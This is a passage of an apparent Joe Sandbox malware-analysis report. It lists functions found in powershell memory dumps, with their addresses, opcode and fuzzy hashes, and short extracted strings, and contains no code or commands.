                                                                              • Opcode ID: 1e726a1ce9b1f404e381f4240930c58c576c375da98c18505d4e98a8a998a440
                                                                              • Instruction ID: 3efc81b35bf792f7c9ac720eebe0bf7f821fe8d510990ea63994a21ed2699d78
                                                                              • Opcode Fuzzy Hash: 1e726a1ce9b1f404e381f4240930c58c576c375da98c18505d4e98a8a998a440
                                                                              • Instruction Fuzzy Hash: 5B213BF4B342429FCB209B358A017BA7FA19FC6640F0445A1E809DB245F776D955CBF1
                                                                              Function 07230E95 Relevance: .1, Instructions: 78COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef96d75f528868f4a0ff7e18e41d8008db9fc6ae08f9453639e3a06a74618882
                                                                              • Instruction ID: 6536849cf2de7aef818d03b0d06e93a8a60fb09d8842856abe5438221dabb9a8
                                                                              • Opcode Fuzzy Hash: ef96d75f528868f4a0ff7e18e41d8008db9fc6ae08f9453639e3a06a74618882
                                                                              • Instruction Fuzzy Hash: C2219BB031435A6BC7704A7509507777FA79FC1704F18842AE9069B2C2DE79DC40C371
                                                                              Function 0297F288 Relevance: .1, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2324489025.000000000297D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0297D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_297d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 003b8ec46ff00a99afe79af42efb9feedd924cde354985925988b24a2be0ce37
                                                                              • Instruction ID: bd2b6f73efa14ca6bdb5eb193cc2168f23efee17c630e19d628a2ca6c3d25e25
                                                                              • Opcode Fuzzy Hash: 003b8ec46ff00a99afe79af42efb9feedd924cde354985925988b24a2be0ce37
                                                                              • Instruction Fuzzy Hash: 7A210375504200DFDF05DF54D9C0F26BFA9FB88314F24C9ADE9091A656C33AD816CBA1
                                                                              Function 06719D8E Relevance: .1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6ba48d49869144ea7976e4c5685814c7729caf0499358077bc6016c137c2d5a3
                                                                              • Instruction ID: 9240cd2c7885ac8c1247d6f89af036fb505104858dbebdbe279163a735da0c08
                                                                              • Opcode Fuzzy Hash: 6ba48d49869144ea7976e4c5685814c7729caf0499358077bc6016c137c2d5a3
                                                                              • Instruction Fuzzy Hash: 4221D375A00619DFCB44CF8DC9949AAFBF5FF48310B258169E909AB361C731ED52CBA0
                                                                              Function 06719597 Relevance: .1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0b86c3cd5b59e2dcb43cd1260fea8880b9fc91e1b6cbfdbb3f594c45404f9a41
                                                                              • Instruction ID: 3813514964ae1d91b6da18d408ef4a1eb2b3fb9b2fa536135b3138b0ae7198da
                                                                              • Opcode Fuzzy Hash: 0b86c3cd5b59e2dcb43cd1260fea8880b9fc91e1b6cbfdbb3f594c45404f9a41
                                                                              • Instruction Fuzzy Hash: 4D214A74E002099FCB50DF9CD9909AEFBB5FF88310B148559D919AB391D731ED41CBA1
                                                                              Function 0297F283 Relevance: .1, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2324489025.000000000297D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0297D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_297d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                                              • Instruction ID: 12d02c39dfc65990b54cb0aa82dec8351f9dff78fa873f41fd7c0f437c8b80c3
                                                                              • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                                              • Instruction Fuzzy Hash: 91219D76504240DFCF06CF54D9C4B26BF72FB48314F24C5A9D9494A656C33AD46ACBA2
                                                                              Function 067195A6 Relevance: .1, Instructions: 54COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 452b954cc80d2c6d60bd552390e3d18acc0363189bc59e9a32241c2d13c9af29
                                                                              • Instruction ID: e6fee507d83568206737b5cc8beb9a65664d14f311c78985636f1c8a9f36964a
                                                                              • Opcode Fuzzy Hash: 452b954cc80d2c6d60bd552390e3d18acc0363189bc59e9a32241c2d13c9af29
                                                                              • Instruction Fuzzy Hash: 1C11E6B4A002099FCB40DF9CD5909AEFBF5FF89310B1585A9E909AB351D731ED41CBA1
                                                                              Function 0671D55C Relevance: .1, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6b12dc514f847b96e2fa6a4abbdfd979f3329f665a1b6e61f2d4202afb224062
                                                                              • Instruction ID: 82621bef21a2ec7d65fee9c7964d9eccb3cbdef2a56944c5e7d62679d04d8de2
                                                                              • Opcode Fuzzy Hash: 6b12dc514f847b96e2fa6a4abbdfd979f3329f665a1b6e61f2d4202afb224062
                                                                              • Instruction Fuzzy Hash: 9A0126397146648FC716977CA41886D3BABEFCE221B1500DBD207CB362CF349C068B62
                                                                              Function 0297D01D Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2324489025.000000000297D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0297D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_297d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1d030884194b0f02d0fbe9d015475ca88daa42a14a52b9e1bd13bfdf71adee9a
                                                                              • Instruction ID: a2850ee01bf5beae191f8b4070a38b399f563f31d63ff6d319669bddc108f2e9
                                                                              • Opcode Fuzzy Hash: 1d030884194b0f02d0fbe9d015475ca88daa42a14a52b9e1bd13bfdf71adee9a
                                                                              • Instruction Fuzzy Hash: BE01D671405344DEEB208E2ACD84B67FF9CEF86374F18D82AED490B246C3799941CAB5
                                                                              Function 0297D006 Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2324489025.000000000297D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0297D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_297d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bcbbf159fc81a62096f34a301f69c569bce941d481fbb2413ab680e4e5872abc
                                                                              • Instruction ID: c2592f6148bc1fb019557c0422d38b69eb227df7d7b262879979004b806be9a1
                                                                              • Opcode Fuzzy Hash: bcbbf159fc81a62096f34a301f69c569bce941d481fbb2413ab680e4e5872abc
                                                                              • Instruction Fuzzy Hash: 86015E7100E3C09ED7128B258C94B56BFB8EF57224F1D80DBD9888F2A7C3699849C772
                                                                              Function 0671D590 Relevance: .0, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cea3969d26a5271cadd52ee36bd8f772ed072a2e38c6e225a0e52aa873dd4539
                                                                              • Instruction ID: 36b1e1bf29f23a9910e2fecfb1f7f3c54a7822f333d8c1189db0e0d63530b5fc
                                                                              • Opcode Fuzzy Hash: cea3969d26a5271cadd52ee36bd8f772ed072a2e38c6e225a0e52aa873dd4539
                                                                              • Instruction Fuzzy Hash: D2F0FF35701610AF8356A73CA01847D3BABEFCC225321011EE817C73A4DF38EC428BA5
                                                                              Function 0671D59E Relevance: .0, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67a31bd3764d79f6f18ab8249bf581a2ff9ceb528608f37fdd8a877c2a29fcd3
                                                                              • Instruction ID: 0e6ecbfba3897c5ad962a294738f59b60088fdf3ccf10a7636b74d717c5cef63
                                                                              • Opcode Fuzzy Hash: 67a31bd3764d79f6f18ab8249bf581a2ff9ceb528608f37fdd8a877c2a29fcd3
                                                                              • Instruction Fuzzy Hash: 49F01D35711510AF8756E739A01847D77ABEFCD665324401EE907D7354DF38EC028BA5
                                                                              Function 0671F1D0 Relevance: .0, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4e9692522b7147b467e5ed762a27b9cd696ef8728e252c50e69b5234a4b9bb04
                                                                              • Instruction ID: 480474664215f44c00e1f101d48c8b6d4fc05e7a5d7da974b5c0f1682e6d7279
                                                                              • Opcode Fuzzy Hash: 4e9692522b7147b467e5ed762a27b9cd696ef8728e252c50e69b5234a4b9bb04
                                                                              • Instruction Fuzzy Hash: 9BF0F6357001045BDB24667EA4486AE7BEBFBCA210B00453ED00FCB294DE35AC068791
                                                                              Function 0671D5A0 Relevance: .0, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2b280bdd7bbe1cc9e0cb3110d0e989c336314b65ec7291ee2983062468af0375
                                                                              • Instruction ID: 24e3a020106de96b8a38cff85f600515eef86e8f552954513c783545845a4f8c
                                                                              • Opcode Fuzzy Hash: 2b280bdd7bbe1cc9e0cb3110d0e989c336314b65ec7291ee2983062468af0375
                                                                              • Instruction Fuzzy Hash: CDF01D35711510AF8756E739A01847D77ABEFCD665324401EE907D7354DF38EC028BA5
                                                                              Function 09021EDA Relevance: .0, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345320958.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 663fed3c6820b0b0f10abd1c90aa71d0deb573db1d1081d217cb315f0a49eda2
                                                                              • Instruction ID: e335cf64656058dca26051bd5d31e773af6c32067671cb2c2034bc59bfac08a9
                                                                              • Opcode Fuzzy Hash: 663fed3c6820b0b0f10abd1c90aa71d0deb573db1d1081d217cb315f0a49eda2
                                                                              • Instruction Fuzzy Hash: 2AF0F931A00119EFCB05DF88DD808AEFBB6FF88320B248519E914A72A0C7329D22DB50
                                                                              Function 0671FB6A Relevance: .0, Instructions: 30COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9bf6e371571ff0b35cd9543c38c92e0750cd553534e5bd869a2894aec7302333
                                                                              • Instruction ID: 6f0f5f0a13deabfe5e157f4890db80c74f129289ea0838c3de7d3f94d74c2cb5
                                                                              • Opcode Fuzzy Hash: 9bf6e371571ff0b35cd9543c38c92e0750cd553534e5bd869a2894aec7302333
                                                                              • Instruction Fuzzy Hash: 67F082313086C09FCB4A5778942C69DBF66EFCA721B0400AED4468B243DF395855C7A6
                                                                              Function 0671F1CE Relevance: .0, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 452d45061a2c81725d34a4dff0b0aac2cd364e42a333369324f93a095b7b9714
                                                                              • Instruction ID: b2e872a2ee9a3266962271da9cabbcb74cbb38ca63c2446dac06cc251d253eee
                                                                              • Opcode Fuzzy Hash: 452d45061a2c81725d34a4dff0b0aac2cd364e42a333369324f93a095b7b9714
                                                                              • Instruction Fuzzy Hash: 70E092367001046B8B2562AEB4585BEBBEBFBCE621710403FE54ECB355CE655C068391
                                                                              Function 0671F938 Relevance: .0, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 704ee6f7e825baee60f329cce16f5688f65a0d6ff5e8eea889c62e47ac623add
                                                                              • Instruction ID: 4e0730b5f6826f0164f7ba4ad82468c57125bb9426c5192f5786fa8d2b8b4db5
                                                                              • Opcode Fuzzy Hash: 704ee6f7e825baee60f329cce16f5688f65a0d6ff5e8eea889c62e47ac623add
                                                                              • Instruction Fuzzy Hash: BDE01230805149EFC748EF64EABA4FDBB74FF06202B44009DD95747792EB202556DF81
                                                                              Function 0671FB78 Relevance: .0, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 94c617b7becbcf5c1a9ff32f1974507a904edacfac29c3334328b481776c7905
                                                                              • Instruction ID: 7f3f01c4d4b175f59faed6668d0a47dee4d8399748a8326210e6687700c511a6
                                                                              • Opcode Fuzzy Hash: 94c617b7becbcf5c1a9ff32f1974507a904edacfac29c3334328b481776c7905
                                                                              • Instruction Fuzzy Hash: BDE0DF31304650A7CB492778A00C2EEBA5BEFC8722F00002EE40A87342EF7919558BE9
                                                                              Function 0671FA02 Relevance: .0, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 461019426fdf50e74230371bae8f525c551c9a1a73241dec8ef0f534bfd0d9f8
                                                                              • Instruction ID: 280d4612012852874d81e7b424efd0433eb3b82703af631de38bd1b11e2ac047
                                                                              • Opcode Fuzzy Hash: 461019426fdf50e74230371bae8f525c551c9a1a73241dec8ef0f534bfd0d9f8
                                                                              • Instruction Fuzzy Hash: F6E09234904248DFD764DF64E4954A97FB1FF05215B00019CD94A8B352EB306851CBC0
                                                                              Function 0671FD87 Relevance: .0, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5fa860f0b4c26156c657db4b406a034c8a615d1f0598e37dba6e456a98eefb57
                                                                              • Instruction ID: fa9aaf0d351ecdf8a4c7144ba701cc8685382f68b3be03273a42bce3cd578284
                                                                              • Opcode Fuzzy Hash: 5fa860f0b4c26156c657db4b406a034c8a615d1f0598e37dba6e456a98eefb57
                                                                              • Instruction Fuzzy Hash: B2E04F71D042099F8780DFAC880116DFBF4AF48200B1084ABC808D7242E73186038BC0
                                                                              Function 0671FD90 Relevance: .0, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                              • Instruction ID: 59419d3882aa5be04f4c35b700d292f113443a0f30f6a94ab41da6d1852e2680
                                                                              • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                              • Instruction Fuzzy Hash: F6D067B0D042099F8780EFADC94156EFBF4EB48200F60C5AAC919E7301E7329A128BD1
                                                                              Function 0671FA10 Relevance: .0, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 01c3df9d4b95ce520c8734888186f8f0d4b8f9fee7f9563eb7413bee84420908
                                                                              • Instruction ID: 87a3869d4fa1c579637bd69cc56bdfdf09f0c134a3214bb816af9741635a63cd
                                                                              • Opcode Fuzzy Hash: 01c3df9d4b95ce520c8734888186f8f0d4b8f9fee7f9563eb7413bee84420908
                                                                              • Instruction Fuzzy Hash: 7CD06234A14149DF8794DF64E45646DBBB6FB44215F104159D90A93351EA305851CBC1
                                                                              Function 0671F948 Relevance: .0, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 837e2879d5505a2784c87c8a76038bed1caa67cca358fca40e3682de82cf4211
                                                                              • Instruction ID: 36be45c4448b38c9046affd8916db67b434b373a344e40c0b928b7eef03428db
                                                                              • Opcode Fuzzy Hash: 837e2879d5505a2784c87c8a76038bed1caa67cca358fca40e3682de82cf4211
                                                                              • Instruction Fuzzy Hash: ACD04C309041499BCB58AB64D55A4FDBB75FA10206B80415DD90B56192EA241556CAC1
                                                                              Function 07231A7E Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ec6b66ed24633fca35121b38a00cd7fe270aa44149dbfe0a06b9ea89b1f77715
                                                                              • Instruction ID: 0761f1a5db9535a5b278aaa0a942a1947769cd7e3111e6ce8b4599f8eac5400c
                                                                              • Opcode Fuzzy Hash: ec6b66ed24633fca35121b38a00cd7fe270aa44149dbfe0a06b9ea89b1f77715
                                                                              • Instruction Fuzzy Hash: 69A001742411009BDA44DA94C992854B762AB85629B29C49BA92A8F396CB63E9039A90

                                                                              Non-executed Functions

                                                                              Function 09040000 Relevance: .1, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345390385.0000000009040000.00000040.00001000.00020000.00000000.sdmp, Offset: 09040000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9040000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4500039169db410d9f41b27a645c6485105b91fb4d12efbca57531523defeabb
                                                                              • Instruction ID: 2bd1658af7396c4bda1fa9247754f47b00c22a2c144f2e945cfe09708b25b23d
                                                                              • Opcode Fuzzy Hash: 4500039169db410d9f41b27a645c6485105b91fb4d12efbca57531523defeabb
                                                                              • Instruction Fuzzy Hash: A1E0267944B3969FCB02863088154447FE16D9610435C88AF8992CB293D1190845CB41
                                                                              Function 0723F5F8 Relevance: 18.0, Strings: 14, Instructions: 494COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$XRoq$XRoq$XRoq$tPjq$tPjq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq
                                                                              • API String ID: 0-3607640656
                                                                              • Opcode ID: 28f2d6f8e2d929c9ce146fc078fabdfbf5a46881c5ce54b7ce4836dca3c09308
                                                                              • Instruction ID: 19105ced4cfcefc41ff067cd202867127ed082b9e1509382b4f18d424b53c8d0
                                                                              • Opcode Fuzzy Hash: 28f2d6f8e2d929c9ce146fc078fabdfbf5a46881c5ce54b7ce4836dca3c09308
                                                                              • Instruction Fuzzy Hash: 99023BF0F2020BDFCB248F64E7506AB7BA6EF89310F548469E8159B294CB75DD45CBA0
                                                                              Function 07237948 Relevance: 16.7, Strings: 13, Instructions: 462COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$d5wk$tPjq$tPjq$$jq$$jq$$jq$$jq$}l$}l
                                                                              • API String ID: 0-1110074392
                                                                              • Opcode ID: a999bb1208c15ecaf6386cf57639f70da4fbee830e8e4f09e24c2723a8d22090
                                                                              • Instruction ID: 929f5a6dbf4d7bf2d4dbdb06bdde1112940b3e53e113b930a85fb21278783251
                                                                              • Opcode Fuzzy Hash: a999bb1208c15ecaf6386cf57639f70da4fbee830e8e4f09e24c2723a8d22090
                                                                              • Instruction Fuzzy Hash: 24E126F172434B8FCF258A68899076ABFB6AFC2311F1488AAD805CB351DB35CD45C7A1
                                                                              Function 07237F58 Relevance: 12.8, Strings: 10, Instructions: 326COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$}l$}l
                                                                              • API String ID: 0-3143649883
                                                                              • Opcode ID: 5903dade531a1167a7841d6c67f7010ba1a96562539455ec95106d758bdc0892
                                                                              • Instruction ID: 4afc40c778260eae8a740e77cc280f0f2b9f36e1c3211887371b03b98462f30c
                                                                              • Opcode Fuzzy Hash: 5903dade531a1167a7841d6c67f7010ba1a96562539455ec95106d758bdc0892
                                                                              • Instruction Fuzzy Hash: F1B147F17283468FDB218A698900B66BFE6EFC2610F1484ABE445CF391DA76CC05C771
                                                                              Function 0723E6A9 Relevance: 11.5, Strings: 9, Instructions: 234COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$d%pq$d%pq$d%pq$d%pq$tPjq$tPjq$$jq
                                                                              • API String ID: 0-1806847741
                                                                              • Opcode ID: 07ffe3427f7a0aac33bf11249d26852e1f4923d3bf9d9f125365ffbe1d483314
                                                                              • Instruction ID: 869c6607a6d4187e7f2228f305fabaeb3bb9ce25c6a3c22bbdf0c55b9e9770ac
                                                                              • Opcode Fuzzy Hash: 07ffe3427f7a0aac33bf11249d26852e1f4923d3bf9d9f125365ffbe1d483314
                                                                              • Instruction Fuzzy Hash: 738117F1F20216DFCB249F28C95066ABBE6EFC4311F168469E8019B391DB71DD48C7A1
                                                                              Function 0723EBDC Relevance: 8.9, Strings: 7, Instructions: 160COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$TQoq$TQoq$tPjq$$jq$$jq$$jq
                                                                              • API String ID: 0-2666386787
                                                                              • Opcode ID: ff5cdbcec028445a09ff50fa3d39d864b0e434f9cddae09e7f2927673c796384
                                                                              • Instruction ID: 2f10a29d33345c06a16c9aaf539ca888978e04edfdafa246f5badbe220e77404
                                                                              • Opcode Fuzzy Hash: ff5cdbcec028445a09ff50fa3d39d864b0e434f9cddae09e7f2927673c796384
                                                                              • Instruction Fuzzy Hash: 0A51D2F1E3020BDFDB24CE05C5447AAB7B2BF45321F5A8566E8149B2A0C771DD88CBA1
                                                                              Function 0723C00E Relevance: 7.9, Strings: 6, Instructions: 403COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
